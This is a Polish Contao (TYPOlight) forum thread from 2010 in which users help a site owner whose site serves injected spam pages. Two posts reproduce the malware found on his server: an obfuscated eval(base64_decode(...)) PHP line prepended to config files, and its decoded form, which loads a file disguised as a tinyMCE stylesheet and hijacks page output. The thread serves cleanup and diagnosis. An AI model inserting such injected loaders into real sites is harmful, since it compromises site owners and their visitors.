Witamy na polskim forum Contao
Zarejestruj się teraz, aby skorzystać ze wszystkich funkcji forum. Kiedy się zalogujesz, będziesz mógł tworzyć tematy, pisać posty, rozdawać punkty reputacji, korzystać z prywatnych wiadomości i zarządzać swoim profilem. Jeśli posiadasz już konto, zaloguj się - w przeciwnym wypadku zarejestruj się już teraz!

Wykrywanie Javascriptu wyłączone

Masz wyłączony javascript. Niektóre funkcje mogą nie działać. Proszę włączyć javascript aby mieć dostęp do pełnej funkcjonalności.

włam na strone/serwer

Rozpoczęte przez scorpimen, Mar 26 2010 21:02

Proszę się zalogować aby odpowiedzieć

8 odpowiedzi na ten temat

#1
scorpimen

Napisany 26 March 2010 - 21:02

Bywalec

Zarejestrowani
31 postów

Strona www:zobacz
LokalizacjaStarogard Gda�ski

witam

ostatnio przeglądałem sobie jakie linki znajduje google i bing na moja stronę i doznałem szoku
na hasło scorpimen pokazuje mnóstwo spamu

i teraz takie cos
http://not4u.scorpim... ... ke you cry
http://not4u.scorpimen.eu/

strona stoi na typolight
co prawda długo stała na wersji 2.6 ale zrobiłem jej aktualizacje ostatnio do najnowszej i dalej mam te śmieci

Jak to wywalić

0

Wróć do góry
Raportuj

#2
Kamil

Napisany 26 March 2010 - 22:04

Contao ambassador

Administratorzy
1538 postów

Strona www:zobacz
LokalizacjaLidzbark Warminski

Albo ktoś dostał się do twojego FTPa, albo powinieneś jak najszybciej wgrać łatkę http://www.typolight... ... -tool.html

Nie wiem jak to usunąć, najpierw sprawdź czy są jakieś podejrzane pliki na serwerze. Wklej tu zawartość pliku .htaccess

0

Codefog - Contao web development

Wróć do góry
Raportuj

#3
qrczak

Napisany 27 March 2010 - 10:09

Ekspert

Zarejestrowani
415 postów

LokalizacjaŻuławy

Był też taki wirus, który wysysał dane do kont ftp, łączył się z nimi i jakiś syf tam wgrywał. Było kilka zgłoszeń tego typu na oficjalnym forum i za każdym razem to był wirus. Nie wiem jak to jest w twoim przypadku ale może warto sprawdzić co masz na ftp i/lub czy coś nie jest doklejone do pliku index.php

0

Wróć do góry
Raportuj

#4
Kamil

Napisany 27 March 2010 - 14:39

Contao ambassador

Administratorzy
1538 postów

Strona www:zobacz
LokalizacjaLidzbark Warminski

Nie wiem jak to jest w twoim przypadku ale może warto sprawdzić co masz na ftp i/lub czy coś nie jest doklejone do pliku index.php

To by się zgadzało - zmienna $_GET['bdoc'], a index.php nie widać, bo włączony jest mod_rewrite.

0

Codefog - Contao web development

Wróć do góry
Raportuj

#5
scorpimen

Napisany 27 March 2010 - 21:56

Bywalec

Zarejestrowani
31 postów

Strona www:zobacz
LokalizacjaStarogard Gda�ski

wrzuciłem świeży index.php i htaccess, ściągnąłem pliki z serwera i przeskanowałem nodem i zero zmiany

chyba czeka mnie czyszczenie całego serwerka i postawienie paru stron od nowa

---
chyba znalazłem winowajce
ciekawe jest to ze siedział w plikach system/config/
na początku plików doklejał tylko skąd ten syf ??

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3JjNS9kb21haW5zL3Njb3JwaW1lbi5ldS9wdWJsaWNfaHRtbC9ub3Q0dS9wbHVnaW5zL3RpbnlNQ0UvdGhlbWVzL3NpbXBsZS9za2lucy9vMms3L2ltZy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
<?php if (!defined('TL_ROOT')) die('You can not access this file directly!');

---
jednak to nie to choć i tak dziwna sprawa skąd to się tam wzieło

0

Wróć do góry
Raportuj

#6
spin80

Napisany 28 March 2010 - 07:34

Ekspert

Zarejestrowani
296 postów

Strona www:zobacz

Nie wiem czy czasem ten wirus nie zajmuje się również plikami default.php i main.php

0

Agencja Interaktywna 7seconds - Wdrożenia Contao - Typolight

Wróć do góry
Raportuj

#7
Kamil

Napisany 28 March 2010 - 09:36

Contao ambassador

Administratorzy
1538 postów

Strona www:zobacz
LokalizacjaLidzbark Warminski

jednak to nie to choć i tak dziwna sprawa skąd to się tam wzieło

Sprawdzałeś plik /plugins/tinyMCE/themes/simple/skins/o2k7/img/style.css.php?

<span class="syntaxhtml"><span class="syntaxdefault"><?phpif </span><span class="syntaxkeyword">(</span><span class="syntaxdefault">function_exists</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'ob_start'</span><span class="syntaxkeyword">)</span><span class="syntaxdefault"> </span><span class="syntaxkeyword">&&</span><span class="syntaxdefault"> </span><span class="syntaxkeyword">!isset(</span><span class="syntaxdefault">$GLOBALS</span><span class="syntaxkeyword">[</span><span class="syntaxstring">'mfsn'</span><span class="syntaxkeyword">])){</span><span class="syntaxdefault">    $GLOBALS</span><span class="syntaxkeyword">[</span><span class="syntaxstring">'mfsn'</span><span class="syntaxkeyword">]=</span><span class="syntaxstring">'/home/rc5/domains/scorpimen.eu/public_html/not4u/plugins/tinyMCE/themes/simple/skins/o2k7/img/style.css.php'</span><span class="syntaxkeyword">;</span><span class="syntaxdefault">    if </span><span class="syntaxkeyword">(</span><span class="syntaxdefault">file_exists</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">$GLOBALS</span><span class="syntaxkeyword">[</span><span class="syntaxstring">'mfsn'</span><span class="syntaxkeyword">]))</span><span class="syntaxdefault">    </span><span class="syntaxkeyword">{</span><span class="syntaxdefault">        include_once</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">$GLOBALS</span><span class="syntaxkeyword">[</span><span class="syntaxstring">'mfsn'</span><span class="syntaxkeyword">]);</span><span class="syntaxdefault">        if </span><span class="syntaxkeyword">(</span><span class="syntaxdefault">function_exists</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'gml'</span><span class="syntaxkeyword">)</span><span class="syntaxdefault"> </span><span class="syntaxkeyword">&&</span><span class="syntaxdefault"> function_exists</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'dgobh'</span><span class="syntaxkeyword">))</span><span class="syntaxdefault">        </span><span class="syntaxkeyword">{</span><span class="syntaxdefault">            ob_start</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'dgobh'</span><span class="syntaxkeyword">);</span><span class="syntaxdefault">        </span><span class="syntaxkeyword">}</span><span class="syntaxdefault">    </span><span class="syntaxkeyword">}}</span><span class="syntaxdefault">?></span></span>

Idę o dychę, że tam siedzi druga część złośliwego kodu.

0

Codefog - Contao web development

Wróć do góry
Raportuj

#8
scorpimen

Napisany 28 March 2010 - 13:05

Bywalec

Zarejestrowani
31 postów

Strona www:zobacz
LokalizacjaStarogard Gda�ski

w tym css.php tez było.

Co znajdę jakiś kod i skasuje to to g.. dokleja mi go znowu. jak się tego pozbyć kompleksowo i co to jest jeśli można wiedzieć. Bo czuje, że wiecie coś o tym świństwie, więcej niż ja.

0

Wróć do góry
Raportuj

#9
Kamil

Napisany 28 March 2010 - 13:32

Contao ambassador

Administratorzy
1538 postów

Strona www:zobacz
LokalizacjaLidzbark Warminski

Albo to świństwo siedzi u ciebie na kompie, albo na serwerze. Gdzie masz hosting?

Po pierwsze, z innego komputera zmień hasło do serwera FTP. Następnie usuń znowu te linijki. Jeśli sytuacja się powtórzy, to będzie wiadomo, że te świństwo zagościło na serwerze. W przeciwnym wypadku zagościło na twoim komputerze.